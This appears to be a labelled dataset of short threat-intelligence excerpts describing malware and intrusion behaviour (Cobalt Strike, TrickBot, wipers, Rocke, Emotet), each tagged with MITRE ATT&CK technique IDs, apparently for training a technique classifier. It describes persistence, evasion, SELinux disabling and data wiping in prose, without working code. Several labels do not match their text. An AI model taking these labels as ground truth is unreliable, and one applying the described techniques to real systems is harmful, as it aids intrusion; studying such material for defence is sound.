{"text1":"Posted on . May 23, 2017 . (May 2, 2022) . by Raphael Mudge . Cobalt Strike 3.8 is now available. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. These commands offer means to spawn a payload, in another desktop session, without remote process injection. As detection of remote process injection becomes more common, it\u2019s important to have other ways to achieve our goals without this offensive technique. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. Go to Help -> Arsenal from a licensed copy of Cobalt Strike to download the Resource Kit. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows. A 21-day Cobalt Strike trial is also available","labels":"['T1059.001']"}
{"text1":"Looking into the arguments shows that the process plugin comes from the received packet to execute functions such as collecting process information, running a new process, and terminating a running one. The process information collected includes the username, user ID, group ID, and process parent ID of the target process","labels":"['T1057', 'T1057']"}
{"text1":"In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult","labels":"['T1027']"}
{"text1":"In my opinion enumeration is not an attack technique that blue teamers should focus their defense efforts on. The best way to prevent unauthorized users from accessing this information is by having strict conditional access policies which govern how and from where users are allowed to use their Azure AD credentials. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here. I haven\u2019t personally looked into bypassing this or if other functionality in Azure breaks if you enable this","labels":"['T1078.004']"}
{"text1":"The bot shows a number of similarities to Dyre but appears to have been rewritten. This assumption is made based on old Dyre code, which would primarily use built-in functions for doing things such as AES and SHA256 hashing. In the recent samples identifying themselves as TrickBot, the code appears to be based on that old code but rewritten to use things such as Microsoft CryptoAPI and COM","labels":"['T1571']"}
{"text1":"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Therefore, there is no centralized point of download. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot","labels":"['T1105']"}
{"text1":"HyperStack sets the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\\Restrict Anonymous value to 0 so anonymous logon users (i.e. null session connections) can list all account names and enumerate all shared resources on a remote share. The implant can then use the WNetAddConnection2 API call to connect to another remote device's IPC$ share. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from","labels":"['T1087.001']"}
{"text1":"That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence","labels":"['T1070.004']"}
{"text1":"Stop the service COMSysApp - Configure the service to autostart (to set up persistence on the system) - Modify registry keys to launch the DLL unser svchost.exe - Specify the malicious DLL path to be loaded into the svchost process. Immediately restart the service - Remove the batch files to reduce the fingerprint on the system","labels":"['T1569.002', 'T1055', 'T1547.001', 'T1070.004', 'T1112']"}
{"text1":"The response to this request is hidden in the source code of following Flickr lookalike page","labels":"['T1001']"}
{"text1":"Upon execution, the malware first decrypts its C2 IP address using a xor-incremental encryption and then creates a mutant, using its C2 IP address as the mutant\u2019s name","labels":"['T1140']"}
{"text1":"The wiper module (SHA256: 391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c) that the dropper writes to the system is responsible for overwriting the data within the MBR, partitions, and files on the system. The wiper carries out this wiping using a legitimate hard disk driver called RawDisk by ElDos. The wiper contains the ElDos RawDisk driver in a resource named 'e' that it extracts by skipping to offset 1984 and reading 27792 bytes from that offset. It then decrypts the data using aa 247-byte key and saves it to \u2018%WINDOWS%\\system32\\hdv_725x.sys\u2019. The wiper then creates a service named \u2018hdv_725x\u2019 for this driver using the following command line command and runs it with \"sc start hdv_725x","labels":"['T1485']"}
{"text1":"Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting, again attempting to extract all Word documents","labels":"['T1135']"}
{"text1":"While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions","labels":"['T1106', 'T1027.003']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1080']"}
{"text1":"When accessing the Pastebin URL, an encrypted blob is downloaded that requires a corresponding RSA private key from the configuration file. The configuration file analyzed did not contain the RSA private key and therefore we were unable to decrypt the contents of the Pastebin link. We assess the decrypted blob was likely a task for the Carbon instance","labels":"['T1140']"}
{"text1":"If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware\/lure, which he will execute afterwards","labels":"['T1204.002', 'T1105']"}
{"text1":"The newer versions of Valak download two payloads in the first stage. The first payload is Valak\u2019s plugin management component (\u201cpluginhost.exe\u201d), and the second is the second stage JavaScript payload of Valak. In earlier versions, Valak did not include the \u201cpluginhost\u201d payload","labels":"['T1105']"}
{"text1":"As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We\u2019ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon\u2019s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component","labels":"['T1566.001']"}
{"text1":"Unit 42 has discovered activity involving threat actors responsible for the OilRig campaign with a potential link to a threat group known as GreenBug. Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor","labels":"['T1059.003', 'T1059.003']"}
{"text1":"spwebmember was written in Microsoft .NET and includes hardcoded values for client project names for data extraction","labels":"['T1114.002']"}
{"text1":"The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process","labels":"['T1055.002']"}
{"text1":"LookBack\u202fmalware is a remote access\u202fTrojan\u202fwritten in C++ that relies on a proxy communication tool to relay data\u202ffrom the infected host to a command and control IP","labels":"['T1070.004']"}
{"text1":"Network activity started with an HTTPS URL to namecha[.]in, which is an alternative namecoin block explorer. Namecoin is a cryptocurrency system that can be used for decentralized DNS. That proves to be the case here, since the URL returned an IP address used for subsequent post-infection traffic as shown in Figure 10","labels":"['T1568']"}
{"text1":"There are multiple ways for the operators to reach a Kobalos-infected machine. The method we\u2019ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port. These variants either connect to a C&C server that will act as a middleman, or wait for an inbound connection on a given TCP port","labels":"['T1205']"}
{"text1":"The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor","labels":"['T1053.005']"}
{"text1":"The following network activity observed from msiexec.exe illustrates how the malware leveraged a signed and verified certification from Sectigo RSA Code Signing CA to propagate","labels":"['T1553.002']"}
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group","labels":"['T1564.001']"}
{"text1":"The resulting executable acts as another loader for yet another embedded file. However, this loader uses the hostname of the current system to decrypt the embedded payload. Therefore, if it is run on any system other than the one intended, the malware will fail to execute. This trait illustrates that the malware is customized; it was created specifically for the exact victim system on which it was discovered","labels":"['T1480.001']"}
{"text1":"Hello, I got kinsing on my main development box (ubuntu 20 lamp stack). NO docker NO redis NO phpunit How it got in, is a mystery. All I can tell is it came in via apache (kinsing was running as www-data and main kinsing executable in \/tmp was owned by www-data). I am using Laravel 7.2.0 not sure are there any loop in the laravel","labels":"['T1133']"}
{"text1":"This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits","labels":"['T1566.001']"}
{"text1":"RAR archiving \u2013 files are transferred to staging servers before exfiltration. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors","labels":"['T1119']"}
{"text1":"LaZagne (SecurityRisk.LaZagne): A login\/password retrieval tool - Mimikatz (Hacktool.Mimikatz): Tool designed to steal credentials - Gpppassword: Tool used to obtain and decrypt Group Policy Preferences (GPP) passwords - SniffPass (SniffPass): Tool designed to steal passwords by sniffing network traffic","labels":"['T1040']"}
{"text1":"As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want","labels":"['T1571']"}
{"text1":"Additionally, once infected, the malware cycles through a large list of command and control (C&C) servers embedded within the malware. It appears while the list is extensive, not all of the C&Cs are active and continue to beacon until a successful connection is established. Despite modifying a small part of itself while copying itself across the network as a means to evade detection, the operators have made no effort to change the C&C communication protocol since its first inception","labels":"['T1049', 'T1008']"}
{"text1":"After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection. Figure 5 shows the commands used to perform these activities on a RAR archive renamed with a *.jpg extension","labels":"['T1070.004']"}
{"text1":"The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902","labels":"['T1046']"}
{"text1":"This final payload is the ThreatNeedle loader running in memory. In addition, the malware saves the configuration data as a registry key encrypted in RC4","labels":"['T1112']"}
{"text1":"Containers that are created during the attack are configured to bind \/tmpXXXXXX directory to the root directory of the hosting server. This means every file on the server\u2019s filesystem can be accessed and even modified, with the correct user permissions, from within the container","labels":"['T1611']"}
{"text1":"Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware\u2019s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm [4","labels":"['T1027']"}
{"text1":"Upon ejection from the network, APT15 managed to regain access a couple of weeks later via the corporate VPN solution with a stolen VPN certificate, which they had extracted from a compromised host","labels":"['T1133']"}
{"text1":"On a different system, operators dropped a legitimate copy of credwize.exe, the Microsoft Credential Backup and Restore Wizard, on disk and used it to execute the malicious library New.dll, another Turian variant","labels":"['T1055.001']"}
{"text1":"While the IronPython scripts are only the first part of the tool, the main task of loading malware is done by an embedded process injector. We dubbed this toolchain IronNetInjector, the blend of IronPython and the injector\u2019s internal project name NetInjector. In this blog, we describe the IronPython scripts and how they\u2019re used to load one or more payloads with the help of an injector","labels":"['T1059.006', 'T1059.006']"}
{"text1":"IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. In contrast, with inline hooking, malware modifies the API function itself. In Figure 11, the malware FinFisher, performs IAT hooking by modifying where the CreateWindowEx points","labels":"['T1056.004']"}
{"text1":"Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma. The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. TLP: WHITE https:\/\/www.us-cert.gov\/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We then conducted a static analysis to examine Lokibot\u2019s techniques and targets. It starts from the tenth byte in the data section of the initial TCP POST request. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. Figure 9Hollow Process; Manually Unpacking the First Stage BinaryWe tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity","labels":"['T1555.003']"}
{"text1":"The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system","labels":"['T1055']"}
{"text1":"Before proceeding to file encryption operations, the ransomware force stops (\u201ckills\u201d) processes listed by process name in a hard-coded list within the encoded strings of the malware. A full list with assessed process function or relationship is provided in Appendix A of this report. While some of the referenced processes appear to relate to security or management software (e.g. Qihoo 360 Safeguard and Microsoft System Center), the majority of the listed processes concern databases (e.g. IBM Tivoli), or ICS-related processes","labels":"['T1562.001']"}
{"text1":"The WannaCry malware consists of two distinct components, one that provides ransomware functionality and a component used for propagation, which contains functionality to enable SMB exploitation capabilities","labels":"['T1210']"}
{"text1":"One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud","labels":"['T1573.001']"}
{"text1":"In order to exfiltrate data, the plugin uses the function \u201cpost\u201d in the HTTPClient class. Post\u201d gives the plugin the ability to upload content and exfiltrate data to the remote C2 whose domain is stored in the registry","labels":"['T1041']"}
{"text1":"The main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed. This is an undocumented behavior in Microsoft Windows","labels":"['T1559.002']"}
{"text1":"Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Unleash the main payload: The msrun.bat script is responsible for unleashing the Wiper. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00","labels":"['T1070.004']"}
{"text1":"Trickbot is installed as a scheduled task, using names like \u201cWinDotNet,\u201d \u201cGoogleTask,\u201d or \u201cSysnetsf\u201d to masquerade as legitimate-appearing processes. These point to various copies of TrickBot installed in the system, usually within the user profile under %USER_DIR%\\AppData\\Roaming\\ or a subdirectory. The subdirectories also use similarly misleading names like \u201cWinDefrag\u201d or \u201cNetSocket\u201d to appear innocuous. TrickBot may also be installed as a service with names like \u201cControlServiceA\u201d that points to a copy in the system drive root","labels":"['T1543.003', 'T1036.004']"}
{"text1":"1) Establish persistence via the Startup folder or theRun registry key (some variants). 2) Inject itself to another process such as rundll32.exe and dllhost.exe (some variants). 3) Decrypt two blobs: Import Table and the loader configuration","labels":"['T1547.001', 'T1055.001']"}
{"text1":"Aside from stealing credentials from applications, it also steals the following information from several popular web browsers such as Google Chrome, Mozilla Firefox, Internet Explorer, and Microsoft Edge","labels":"['T1555.003']"}
{"text1":"The adversary also used the commodity Cobalt Strike framework and Plink tunneling tool in many of these campaigns","labels":"['T1558.003']"}
{"text1":"The Lizar server application, meanwhile, is written using the .NET framework and runs on a remote Linux host, researchers said. It supports encrypted communications with the bot client","labels":"['T1573']"}
{"text1":"The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]\/\/petshopbook[.]com","labels":"['T1059.005']"}
{"text1":"Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4","labels":"['T1082', 'T1546.012']"}
{"text1":"It will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from the \u2018aclmain.sdb\u2019 file and performs process hollowing against this instance of msiexec.exe prior to resuming the process","labels":"['T1055.012']"}
{"text1":"Each of the Silent Librarian lures ends with a very realistic looking closing signature containing contact information for the target library. This information is collected through open source research conducted by the threat actors. In some cases, all of the contact information can be found together on one webpage; however, some of the information is in different locations, indicating the actors are likely performing manual reconnaissance to gather the information","labels":"['T1594']"}
{"text1":"The primary objective of the HermeticWiper is to destroy the master boot record (MBR) of a system, shredding data and rendering the system unusable","labels":"['T1561.002']"}
{"text1":"Hildegard searches for credential files on the host, as well as queries metadata for cloud-specific credentials","labels":"['T1552.005']"}
{"text1":"FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. The distribution servers were used to stage the LockerGoga ransomware, additional utilities, and deployment scripts to automate installation of the ransomware. Mandiant identified a utility script named kill.bat that was run on systems in the environment. This script contained a series of anti-forensics and other commands intended to disable antivirus and destabilize the operating system. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. These BAT files contained psexec commands to connect to remote systems and deploy kill.bat along with LockerGoga. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc","labels":"['T1562.001']"}
{"text1":"Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency","labels":"['T1566.001']"}
{"text1":"Business info at outsidersecurity.nl . Introducing ROADtools - The Azure AD exploration framework . 15 minute read . Over the past 1.5 years I\u2019ve been doing quite a lot of exploration into Azure AD and how it works under the hood. So I set myself a few goals: - Provide tooling for both Red teams and Blue teams to explore all Azure AD data in an accessible way. Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database. Where to get the data . Since Azure AD is a cloud service, there isn\u2019t a way to reverse engineer how it works, or a central repository where all the data is stored that you can access. While researching Azure and looking through the requests in the Azure Portal, at some point I noticed that the portal was calling a different version of the Azure AD Graph, the 1.61-internal version. This internal version of the Azure AD graph exposes much more data than any of the official API\u2019s that are offered by Microsoft. To create the object structure, ROADrecon uses the OData metadata definition that the Azure AD graph exposes. ROADrecon will by default pretend to be the Azure AD PowerShell module and will thus inherit its permissions to access the internal version of the Azure AD graph. Gathering all the data . The second step is data gathering, which the roadrecon gather command does. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here","labels":"['T1119']"}
{"text1":"After the variables are set, the command line script copies QlpxpQpOpDpnpRpC.ini to the executable name that has been picked for this run and then attempts to kill any legitimate process using the specified name before launching it. The name for the .ini file is randomized per archive, but almost always turns out to be that of the VNC server itself","labels":"['T1036.005']"}
{"text1":"The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work","labels":"['T1547.001', 'T1550.002']"}
{"text1":"DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do\/while loops to enumerate through network resources, logical drives, and directories. It also uses QueueUserWorkItem to implement thread pooling for its file encryption threads","labels":"['T1083']"}
{"text1":"The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case","labels":"['T1053.005']"}
{"text1":"Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document be printed to PDF directly. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector as to what has been observed in a campaign reported by industry[7], however as mentioned earlier the research covered in this blog is part of a different activity set","labels":"['T1566.001']"}
{"text1":"The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve data from memory, or a fileserver to copy IP, as we have both observed","labels":"['T1041']"}
{"text1":"The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. Although the backdoor supports dozens of commands, most of them enable the operator to manipulate an encrypted storage file and reconfigure the implant. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines","labels":"['T1027']"}
{"text1":"If the file \/usr\/sbin\/setenforce exists, the malware executes the command, setenforce 0. This command configures the system\u2019s Security-Enhanced Linux (SELinux) module, which provides support in the system's access control policies, into permissive mode \u2014 that is, setting the SELinux policy so that it is not enforced. If the system has the \/etc\/selinux\/config file, it will write these commands into the file: SELINUX=disabled and SELINUXTYPE=targeted commands. The former disables the SELinux policy (or disallows one to be loaded), while the latter sets selected processes to run in confined domains","labels":"['T1518.001']"}
{"text1":"One of the tactics it uses to avoid drawing attention to itself is impersonating commonly used software packages such as Windows or Adobe Reader. It has never attempted to compromise the software itself. Rather, it gives its tools file names similar to those used by the software and places them in directory trees that could be mistaken for those used by the legitimate software","labels":"['T1036.005']"}
{"text1":"From a code perspective, little has changed between Ryuk binaries compiled in March and those compiled in September. The functionality has remained overall static since introducing features for targeting hosts on a local area network (LAN). The most notable change to Ryuk is the introduction of code obfuscation. The code obfuscations appear to be designed to slow down the reverse engineering process by using anti-disassembly and code transformation obfuscation techniques","labels":"['T1027']"}
{"text1":"Since 2020, Proofpoint researchers have observed TA416, an actor assessed to be aligned with the Chinese state, utilizing web bugs to profile their targets. Commonly referred to as tracking pixels, web bugs embed a hyperlinked non-visible object within the body of an email that, when enabled, will attempt to retrieve a benign image file from an actor-controlled server. This provides a \u201csign of life\u201d to threat actors and indicates that the targeted account is valid with the user being inclined to open emails that utilize social engineering content. TA416 has been using web bugs to target victims prior to delivering malicious URLs that have installed a variety of PlugX malware payloads","labels":"['T1608']"}
{"text1":"Cybercriminals will often use LNK files attached in an email\u00a0to launch an attack on unsuspecting victims. And we recently noticed another campaign using this technique","labels":"['T1204.002']"}
{"text1":"After this information is obtained, the attacker can generate and send a specially crafted HTTP POST request to the Exchange server with an XML SOAP payload to the Exchange Web Services (EWS) API endpoint","labels":"['T1590']"}
{"text1":"A threat actor known as Silent Librarian\/TA407\/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back","labels":"['T1608.005']"}
{"text1":"Once run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable","labels":"['T1561.002']"}
{"text1":"Checking the DLLs related to iDefense SysAnalyzer, Microsoft Debugging DLL and Sandboxies - Calling IsDebuggerPresent and GetTickCount to identify a debugger - Checking VMWare related file","labels":"['T1497.001']"}
{"text1":"The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker\u2019s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim\u2019s system","labels":"['T1083', 'T1048.003']"}
{"text1":"CookieMiner issues a series of commands to configure the victim\u2019s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address \u201ck1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H\u201d has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work).\u00ad\u00ad\u00ad The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The has addresses in Figure 8 use the \u201cYescrypt\u201d algorithm which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency","labels":"['T1543.001']"}
{"text1":"For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014\u00a0the Linux kernel firewall \u2014\u00a0using the iptc_insert_entry() function from libiptc1 to allow output communication to it","labels":"['T1562.004']"}
{"text1":"38, the credentials are retrieved from the logins.json file and the browser history is retrieved from the places.sqlite database","labels":"['T1217']"}
{"text1":"The operators simply deploy their first-stage .php script in them, which will check the connection and get the actual C2 server domain name using an HTTP GET request","labels":"['T1071.001']"}
{"text1":"1) Copy itself to the %APPDATA%\\Microsoft folder, add this file path in the registry \u2018Run\u2019 key under the value \u2018BackUp Mgr\u2019 and then execute the loader from the copied location. 2) If the loader cannot access the %APPDATA% location or if the loader is running from this location already, then it adds the current file path in the \u2018Run\u2019 registry key under the value \u2018BackUp Mgr\u2019 and executes the loader again from this location","labels":"['T1547.001']"}
{"text1":"As we mentioned, the adversary used a technique called template injection. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim\u2019s system","labels":"['T1036']"}
{"text1":"We suspect that the malware uses this extension to grab the victim\u2019s cookies and use them from another device to ride the victim\u2019s active session","labels":"['T1539']"}
{"text1":"Last but not least, the malware creates an id, in the same way as seen in previous Zebrocy binaries. It retrieves the UserName via the GetUserNameW Windows API and prepends the volume serial number of the C:\\ drive","labels":"['T1082']"}
{"text1":"Should the victim use one of these portable browsers with a proxy server configured, the malware can find that in the user\u2019s preferences and use that proxy to communicate with its C&C servers","labels":"['T1090.002']"}
{"text1":"APT10 has targeted or compromised manufacturing companies in India, Japan and Northern Europe; a mining company in South America; and multiple IT service providers worldwide. Traditional and Novel Methods . This recent APT10 activity has included both traditional spear phishing and access to victim\u2019s networks through service providers. In addition to the spear phishes, FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers. Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider\u2019s customer. In addition, web traffic between a service provider\u2019s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily. A notable instance of this observed by FireEye involved a SOGU backdoor that was set to communicate with its C2 through a server belonging to the victim\u2019s service provider. The actor then tested connectivity to an IP managed by the victim\u2019s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor. This effectively routes SOGU malware traffic through the victim\u2019s service provider, which likely indicates a foothold on the service provider\u2019s network. Their abuse of access to service provider networks demonstrates that peripheral organizations continue to be of interest to a malicious actor \u2013 especially those seeking alternative angles of attack","labels":"['T1199']"}
{"text1":"Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started","labels":"['T1489']"}
{"text1":"In another update, the P8RAT sample from August 2020 looks for two process names (\u201cVBoxService.exe\u201d and \u201cvmtoolsd.exe\u201d) on the victim\u2019s system, to detect VMware or VirtualBox environments at the beginning of its main malicious function","labels":"['T1497.001']"}
{"text1":"While Emotet has been around for many years and is one of the most well-known pieces of malware in the wild, that doesn't mean attackers don't try to freshen it up. These new campaigns have been observed following a period of relatively low Emotet distribution activity, corresponding with the observance of Orthodox Christmas in certain geographic regions. These new malicious efforts involve sending victims malicious Microsoft Word attachments with embedded macros that download Emotet. This latest strain has also gained the ability to check if the infected IP where the malicious email is being sent from is already blocklisted on a spam list","labels":"['T1059.005']"}
{"text1":"PlugX executes DLL hijacking with benign applications such as ESET antivirus, Adobe Update etc. Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB","labels":"['T1059.003']"}
